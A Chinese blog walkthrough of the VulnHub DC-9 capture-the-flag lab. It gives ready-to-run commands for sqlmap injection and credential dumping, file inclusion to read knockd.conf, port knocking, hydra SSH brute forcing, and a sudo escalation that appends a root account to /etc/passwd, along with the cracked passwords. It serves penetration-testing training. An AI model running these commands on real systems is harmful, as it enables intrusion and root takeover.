首页 > 其他分享 >DC-9-sudo提权

DC-9-sudo提权

时间:2024-05-04 22:12:11浏览次数:20  
标签:文件 search -- sudo 端口 DC 192.168 提权 75.161

标签SQL注入本地文件包含LFI端口敲门hydra爆破linux提权

0x00 环境准备

下载地址:https://www.vulnhub.com/entry/dc-9,412/
靶机描述:

DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

0x01 信息搜集

1.探测靶机地址

命令:arp-scan -l
image.png
靶机地址:192.168.75.161

2.探测靶机开放端口

命令:nmap -sV -p- 192.168.75.161
image.png
开放了22(filtered)和80端口,但是22端口被过滤了,那就先看一下80端口
image.png
插件没有识别到web指纹

0x02 SQL注入

在search菜单下有个提交框,可能存在POST注入
image.png
Burp Suite测一下
image.png
接下来用SQLmap进行遍历

sqlmap -u http://192.168.75.161/results.php --data "search=1" --batch -v 3 --level 3 --dbs

image.png

1.Staff数据库

sqlmap -u http://192.168.75.161/results.php --data "search=1" --batch -v 3 --level 3 -D Staff --tables

image.png
查看数据表,命令:

StaffDetails表:
sqlmap -u http://192.168.75.161/results.php --data "search=1" --batch -v 3 --level 3 -D Staff -T StaffDetails --columns

Users表:
sqlmap -u http://192.168.75.161/results.php --data "search=1" --batch -v 3 --level 3 -D Staff -T Users --dump

StaffDetails表:
image.png
Users表:
image.png
密码的加密方式应该是md5
image.png
得到了admin的账号和密码admin\transorbital1

2.users数据库

sqlmap -u http://192.168.75.161/results.php --data "search=1" --batch -v 3 --level 3 -D users --tables

image.png

sqlmap -u http://192.168.75.161/results.php --data "search=1" --batch -v 3 --level 3 -D users -T UserDetails --dump

image.png
在UserDetails表中发现了很多账号密码
用管理账号登陆网站后台
image.png

0x03 本地文件包含LFI

使用admin账户登录之后,登录首页提示找不到文件,怀疑存在文件读取漏洞
image.png
这里猜测文件参数是file
image.png

0x04 端口敲门

如下说明:
如果你有一台公网可访问的服务器,黑客可以轻松扫描其IP地址,查找服务器上的开放端口(尤其是用于SSH的端口22)。将服务器隐藏起来、不让黑客看见的一种方法是使用knockd。knockd是一种端口试探服务器工具。它侦听以太网或其他可用接口上的所有流量,等待特殊序列的端口命中(port-hit)。telnet或Putty等客户软件通过向服务器上的端口发送TCP或数据包来启动端口命中。

端口敲门服务,即:knockd服务。该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性。

换句话说,如果知道自定义的端口,逐个进行敲门,这样我们就能够开启SSH端口,从而进行连接,所以利用LFI来查看knock.conf文件配置,得到自定义端口
现在看一下/etc/knockd.conf文件中的自定义端口
image.png
有3个自定义端口,分别是:7469,8475,9842
依次访问这三个端口就可以打开SSH服务了

nmap -p 7469 192.168.75.161
nmap -p 8475 192.168.75.161
nmap -p 9842 192.168.75.161

image.png
现在看一下ssh端口,命令:nmap -p 22 192.168.75.161
image.png
open!

0x05 hydra爆破SSH

sql注入的时候,拿到了很多用户名和密码,把它们分别保存
然后使用hydra进行ssh爆破。命令:hydra -L user.txt -P pass.txt -t 10 ssh://192.168.75.161
使用"-l"选项指定单个登录名,使用"-p"选项指定单个密码。使用"-L"选项指定一个文件来指定多个登录名,使用"-P"选项指定一个文件来指定多个密码,"-t"表示使用线程。
image.png
爆破出来3个账号:chandlerb \ UrAG0D!、joeyt \ Passw0rd、janitor \ Ilovepeepee
登录SSH(注意应该使用ls -la查看隐藏文件或目录),发现只有janitor用户存在隐藏可读文件

ssh [email protected]

image.png
这个文件看起来是一个存放密码的文件,将密码复制到pass.txt中,再次使用hydra进行爆破
image.png
爆破出了一个新的账号:fredf \ B4-Tru3-001

0x06 提权

登陆到fredf账号,查看下fredf的sudo权限,发现可以NOPASSWD执行root权限的文件

sudo -l

image.png
查看发现test是一个python文件
image.png
使用命令:find / -name test.py 2>/dev/null查找python文件,进行查看
image.png
该文件需要传入三个参数,这三个参数都是文件,传入三个参数后,会读取第二个文件,然后将第二个文件的内容追加到第三个文件里。
既然这样,我们就可以利用这个程序向/etc/passwd文件后追加一个拥有root权限的账户,也就是说把/etc/passwd文件设置为第三个参数,而第二个参数由我们自己创建,这个文件里是拥有root权限账户的信息,第一个参数随便写一个就好。
我们先使用openssl来创建第二个参数文件中的内容
命令:sudo openssl passwd -1 -salt hacker password
这条命令的意思是创建一个用户名为hacker,密码为password的用户

-1 的意思是使用md5加密算法
-salt 自动插入一个随机数作为文件内容加密

image.png
修改后的值:hacker:$1$hacker$9MeWOdvz78rHYG01HSLfr/:0:0::/root:/bin/bash

echo 'hacker:$1$hacker$9MeWOdvz78rHYG01HSLfr/:0:0::/root:/bin/bash' >> /tmp/passwd

sudo /opt/devstuff/dist/test/test /tmp/passwd /etc/passwd

切换到新添加的账户,提权成功
image.png

标签:文件,search,--,sudo,端口,DC,192.168,提权,75.161
From: https://www.cnblogs.com/NoCirc1e/p/18172799

相关文章

  • DC-8-Drupal-exim4提权
    Vulnhub简介Vulnhub是一个提供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root权限和查看flag。靶场部署Vulnhub官网:https://www.vulnhub.com......
  • WPF datagrid datagridtemplatecolumn DataGridTemplateColumn.CellEditingTemplate D
    //xaml<Windowx:Class="WpfApp89.MainWindow"xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"xmlns:d="http://schemas.mic......
  • WPF Datagrid DataGridComboBoxColumn ObjectDataProvider ObjectDataProvider.Method
    //xaml<Windowx:Class="WpfApp90.MainWindow"xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"xmlns:d="http://schemas.mic......
  • springboot+MDCAdapter自定义starter实现日志全链路追踪
    MDCMDC(MappedDiagnosticContext,映射调试上下文)是日志系统提供的一种方便在多线程条件下记录日志的功能使用场景一个常用的场景就是Web服务器中给每个请求都分配一个独特的请求id,所有的日志都会打印这个请求id,这样一个请求下的所有日志信息都可以很方便的找到。欢迎关注个人公......
  • 基于DCT变换的彩色图像双重水印嵌入和提取算法matlab仿真
    1.算法运行效果图预览灰度图   彩色图   2.算法运行软件版本matlab2022a  3.算法理论概述      双重水印嵌入算法涉及两个独立的水印:主水印和辅水印,它们可以是灰度图像、二进制序列或其他形式的数据。以下简述嵌入过程: 图像预处理:将彩色图像从R......
  • BOSHIDA AC/DC电源模块的电磁兼容性分析与方案设计
    BOSHIDAAC/DC电源模块的电磁兼容性分析与方案设计BOSHIDAAC/DC电源模块是一种将交流电转换为直流电的电源模块,常用于各种电子设备中。然而,由于电磁干扰可能会对设备的正常运行造成影响,因此需要对AC/DC电源模块的电磁兼容性进行分析和方案设计。 首先,我们需要对AC/DC电源模......
  • 解锁HDC 2024之旅:从购票到报名,全程攻略
    本文分享自华为云社区《解锁HDC2024之旅:从购票到报名,全程攻略》,作者:华为云社区精选。Hi,代码界的小伙伴们,集结号已经吹响了!华为开发者大会(HDC2024)——这场汇聚了HarmonyOSNEXT鸿蒙星河版、盘古大模型5.0等创新火花与智慧碰撞的盛宴,将于6月21日至23日在东莞松山湖盛大开启。你是......
  • leedcode-排列硬币
    自己写的:importmathclassSolution:defarrangeCoins(self,n:int)->int:#计算判别式discriminant=1+8*n#计算根root1=(-1+math.sqrt(discriminant))/2#返回地板取整后的根returnmath.floo......
  • Linux 下以其他用户身份运行程序—— su、sudo、runuser
    转自:https://blog.csdn.net/u011250186/article/details/106335028/本文综合分析了Linux系统下,如何使用runuser命令、su命令和sudo命令以其他用户身份来运行程序,以及这三个命令的运行效率比较。 一、su命令临时切换用户身份SU:(Switchuser切换用户),可让一个普通用户切换为......
  • leedcode-字符串中的单词数
    classSolution:defcountSegments(self,s:str)->int:n=len(s)#如果字符串长度为1且不是空格,则只有一个段ifn==1ands[0]!='':return1#如果字符串长度为1且是空格,则没有段ifn==1ands[0]==......